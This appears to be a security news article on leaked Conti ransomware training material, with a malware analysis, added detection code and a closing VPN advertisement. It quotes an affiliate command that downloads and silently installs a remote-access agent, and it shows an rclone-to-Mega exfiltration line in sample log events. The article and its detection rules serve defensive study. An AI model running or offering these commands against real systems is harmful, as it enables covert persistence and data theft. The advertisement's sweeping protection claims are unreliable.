The inner workings of Conti Ransomware have been revealed as training material given to ransomware affiliates was leaked online earlier this month. The material exposes how affiliates abuse legitimate software and search for cyber insurance policies when using Conti Ransomware on.
The material was leaked by a disgruntled affiliate, who also leaked the IP addresses for Cobalt Strike C2 servers used by the Conti Ransomware gang. A part of this leak was a 113MB archive containing training material for conducting Conti Ransomware attacks.
Due to the leak, security researchers, network admins, and incident responders have a better chance when tackling Conti Ransomware infections.
Advanced Intel’s CEO Vitali Kremez has already capitalized on this and published new research on how Conti Ransomware attacks work.
One method Kremez noted was the use of the legitimate Atera remote access software as a backdoor for continued persistence.
Atera is an interesting alternative to Cobalt Strike, another legitimate piece of software that can be used for remote access. Because many different ransomware operations use Cobalt Strike, security software products have become better at detecting it. To avoid this detection, Kremez states that the Conti gang is installing the legitimate Atera remote access software on compromised systems, which the security software won’t detect.
Kremez states that they have seen the following command used by Conti affiliates to install Atera on a compromised device:
shell curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1
“In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to receive an agent installation script and console access,” explained Kremez.
Kremez advises admins to use tools to block or audit command-line tools in order to detect malicious activity.
“Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious ‘curl’ command and unauthorized ‘.msi’ installer scripts particularly those from C:\ProgramData and C:\Temp directory,” advises Kremez.
A particularly interesting document leaked was titled ‘CobaltStrike MANUAL_V2 .docx’, which lays out the steps an affiliate should take when using Conti Ransomware.
The gang tells affiliates that once the network is breached, they should immediately start exfiltrating data from the compromised network. This is essential as it allows affiliates to carry out double extortion: threatening victims that if they don’t pay the ransom demands, stolen documents will be sold to the highest bidder.
When exfiltrating data, affiliates are advised to search for documents related to the company’s financials and whether they have a cybersecurity policy. “Search by keywords. need accounting reports. bank statements. for 20-21 years. all fresh. especially important, cyber insurance, security policy documents,” reads the translated Conti Ransomware training document.
The document also tells affiliates to immediately upload the data to Mega, which they used as a hosting platform for the exfiltrated data.
Kremez said that the attackers use the legitimate ‘rclone’ program to upload the data directly to the Mega cloud storage service.
“Rclone config is created and an external location (MEGA in this case) for data synchronization (data cloning) is established. The needed network shares are assigned within the rclone.conf on the victim’s network and a command is executed,” explains Kremez in a blog post.
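The Atera installation command and the rclone-to-Mega exfiltration described above both leave distinctive process command lines. The following is an added example, not code from the article or from Advanced Intel, that applies Kremez's advice as detection rules over constructed process-creation log lines (Sysmon Event ID 1 style, in an assumed ParentImage|Image|CommandLine layout); the sample events are made up and modelled on the quoted commands, with REDACTED placeholders kept as on the page.

```python
import re

# Constructed process-creation events in an assumed "ParentImage|Image|CommandLine"
# layout. These are made-up samples modelled on the article's quoted commands,
# not real telemetry. REDACTED is kept as a placeholder, as on the page.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|"
    r'curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com"',
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|"
    r"msiexec /i C:\ProgramData\setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1",
    r"C:\Windows\System32\cmd.exe|C:\Temp\rclone.exe|"
    r"rclone.exe copy \\FILESRV01\Finance mega:exfil --config C:\Temp\rclone.conf",
    # Benign-looking installer from a user profile: must not fire the staging-dir rule.
    r"C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|"
    r"msiexec /i C:\Users\alice\Downloads\7zip.msi",
]

# Staging directories called out in the article's advice (C:\ProgramData, C:\Temp).
STAGING_DIRS = r"(?:C:\\ProgramData|C:\\Temp)\\"

# Each rule is (name, compiled regex applied to the command line only).
RULES = [
    ("curl_downloads_msi", re.compile(r"\bcurl\b.*-o\s+\S+\.msi\b", re.I)),
    ("atera_agent_fetch", re.compile(r"servicedesk\.atera\.com/GetAgent", re.I)),
    ("msiexec_from_staging_dir", re.compile(r"\bmsiexec\b.*?/i\s+" + STAGING_DIRS, re.I)),
    ("rclone_to_mega", re.compile(r"\brclone(?:\.exe)?\b.*\bmega:", re.I)),
]


def parse_event(line):
    """Split one constructed log line into (parent_image, image, command_line)."""
    parent, image, cmdline = line.split("|", 2)
    return parent, image, cmdline


def scan_events(lines):
    """Return {rule_name: [matching command lines]} for every rule that fires."""
    hits = {}
    for line in lines:
        _parent, _image, cmdline = parse_event(line)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.setdefault(name, []).append(cmdline)
    return hits


if __name__ == "__main__":
    for rule, cmds in scan_events(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(cmds)} hit(s)")
```

The rules key on command-line shape rather than file hashes, so renaming setup.msi or rclone.exe does not evade them; the staging-dir rule deliberately ignores installers launched from user profiles to keep noise down.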
Conti Ransomware Analysis
Note: The Analysis of Conti Ransomware was carried out by researchers at Vipre Labs.
Conti ransomware encrypts the files of their victims and publishes the data on their website similar to what other strains do. This extortion behavior is visible on their ransom note saying “We’ve downloaded your data and are ready to publish it on our news website”.
When executed, it starts encrypting files and changes the extension of the encrypted files to .ODMUA. Like other ransomware, it leaves a ransom note with the filename “readme.txt”.
The Conti ransomware website has instructions on how to upload the README.txt for decryption and a contact button at the bottom left of the page. Once you click the contact button, a form appears where you provide your contact information and question, as shown below.
Conti ransomware performs a known malware technique called process hollowing: the malware creates a process in a suspended state, unmaps the PE image from that process’s address space using the ZwUnmapViewOfSection function, writes its malicious code using WriteProcessMemory, sets a new entry point using SetThreadContext, and resumes execution of the suspended process using the ResumeThread function.
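The hollowing sequence just described (suspended create, unmap, write, new entry point, resume) can be matched as an ordered pattern in an API trace. The following is an added detection example, not part of the Vipre Labs analysis; the trace lines are constructed sandbox-style output in an assumed "pid api note" layout, and intervening calls such as VirtualAllocEx are tolerated because the article does not claim the five calls are contiguous.

```python
from collections import defaultdict

# Constructed API-trace lines in an assumed "<pid> <api> <note>" layout.
# Not real Conti telemetry: pid 4100 follows the hollowing sequence described
# in the article, pid 5210 is a plain (non-suspended) process start.
SAMPLE_TRACE = """\
4100 CreateProcessW flags=CREATE_SUSPENDED
4100 ZwUnmapViewOfSection base=0x400000
4100 VirtualAllocEx size=0x3a000
4100 WriteProcessMemory bytes=0x3a000
4100 SetThreadContext entry=0x4012e0
4100 ResumeThread tid=4104
5210 CreateProcessW flags=0
5210 WriteProcessMemory bytes=0x10
5210 ResumeThread tid=5212
"""

# Ordered API sequence that characterises hollowing per the article. A None
# note means "any arguments"; a string must appear in the call's note.
HOLLOWING_SEQUENCE = [
    ("CreateProcessW", "CREATE_SUSPENDED"),
    ("ZwUnmapViewOfSection", None),
    ("WriteProcessMemory", None),
    ("SetThreadContext", None),
    ("ResumeThread", None),
]


def parse_trace(text):
    """Group calls by pid, preserving order: {pid: [(api, note), ...]}."""
    calls = defaultdict(list)
    for line in text.splitlines():
        pid, api, note = line.split(" ", 2)
        calls[pid].append((api, note))
    return calls


def matches_sequence(calls, sequence):
    """True if `sequence` occurs in order (not necessarily contiguously) in `calls`."""
    idx = 0
    for api, note in calls:
        want_api, want_note = sequence[idx]
        if api == want_api and (want_note is None or want_note in note):
            idx += 1
            if idx == len(sequence):
                return True
    return False


def find_hollowing(text):
    """Return the sorted pids whose call history matches the hollowing sequence."""
    return sorted(pid for pid, calls in parse_trace(text).items()
                  if matches_sequence(calls, HOLLOWING_SEQUENCE))
```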
Upon research, we found that the -p argument encrypts a specific directory with a single thread and the -m argument encrypts files with multiple threads. This means that Conti ransomware has multi-threading capability: the main ransomware process creates child threads to speed up encryption.
It uses the string “hsfjuukjzloqu28oajh727190”, decrypted with the string decryption routine mentioned above, to create a mutex via the CreateMutexA function, then checks whether that mutex already exists. This is commonly used by ransomware to avoid infecting the system more than once.
It also deletes all shadow volume copies on the infected system to ensure that victims cannot recover their encrypted files.
After deleting the shadow copies, Conti ransomware starts its file encryption by first creating the ransom note, which is dropped first on the C: drive using “CreateFileW”, and writing the note’s content using “WriteFile”.
As with other ransomware, it uses the functions “FindFirstFileW” and “FindNextFileW” to locate the files it will encrypt. Conti ransomware has a list of files, file extensions and directories that are excluded from infection.
When Conti finds a file to encrypt, it generates the keys that will be used to encrypt it. It uses the handle returned by the “CryptAcquireContext” function, which requests a cryptographic context from the Microsoft Enhanced Cryptographic Provider, then the “CryptGenRandom” function to generate cryptographically random bytes, and the “CryptEncrypt” function. It leverages AES-256 encryption for its infection.
It then opens the target file using the “CreateFile” function and retrieves its size using “GetFileSize”. After this, the malware decrypts its list of file extensions and checks whether the targeted file’s extension is in the list.
Conti ransomware not only encrypts the files of the infected machine but also spreads to and infects other machines on the same network using the SMB protocol.
Attacks like the Conti Ransomware campaign show that cyberattacks are increasing at an exponential rate, and both government and business leaders are underprepared to face the fallout of an attack. There are several tools internet users should use to increase their online protection. One of these tools is SaferNet.
SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always-on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.
Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employees’ or family members’ devices, including activity, time spent online, and threats blocked.